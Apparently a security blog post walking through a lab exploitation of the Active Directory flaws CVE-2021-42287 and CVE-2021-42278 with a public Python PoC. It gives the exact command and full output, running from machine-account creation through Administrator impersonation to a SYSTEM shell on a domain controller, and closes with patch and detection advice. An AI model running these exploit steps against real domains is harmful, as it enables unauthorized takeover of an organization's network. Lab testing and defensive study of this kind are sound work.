A new year and a yet another way to take over Microsoft Active Directory.
Back in November last year, Microsoft patched two Active Directory privilege escalation vulnerabilities. When these two vulnerabilites are combined it allows for a domain user level takeover of an Active Directory setup.
These two privilege escalation vulnerabilities are tracked as CVE2021-42287 and CVE-2021-42278. Github user WazeHell created a PoC for the combined takeover attack using python3 and impacket. This tool was released on 11/12/21 on both Github and Twitter. Lets go ahead and lab it!

Disclaimer
As always, seek permission before using such tools on a production network, or use a VMware lab that way no one gets hurt!

Prerequisites
1. A Kali Linux VM (python3 and impacket should already be installed)
2. Download the repository from WazeHell github – sam_the_admin.py
3. In this example our VM host ip is 10.1.1.1 and our DC is 10.1.1.10
4. Setup a standard Windows AD domain and a domain user account / password. Make sure November 2021 security patches are not installed.

Steps
1. Launch a Kali linux terminal and run the command:
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip 10.1.1.10 -shell
2. If all goes well you’ll see the privilege escalation output of the python script, wherein it creates a machine account and impersonates the administrator.
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip 10.1.1.10 -shell
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[*] Selected Target dc1.testdomain.network
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-93$"
[*] MachineAccount "SAMTHEADMIN-93$" password = 4Ug3TAHquT^U
[*] Successfully added machine account SAMTHEADMIN-93$ with password redacted.
[*] SAMTHEADMIN-93$ object = CN=SAMTHEADMIN-93,CN=Computers,DC=testdomain,DC=network
[*] SAMTHEADMIN-93$ sAMAccountName == dc
[*] Saving ticket in dc1.ccache
[*] Resting the machine account to SAMTHEADMIN-93$
[*] Restored SAMTHEADMIN-93$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving ticket in Administrator.ccache
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

3. It will drop to a shell on the DC where you are system:
C:\Windows\system32>whoami
nt authority\system

samtheadmin.py

Mitigation
Install the November 2021 Microsoft Security patches for Windows Server platforms in your environment.
As you can see above, the exploit is trival to perform with minimal effort required.
You can use a threat query with 365 defender that Microsoft detail here.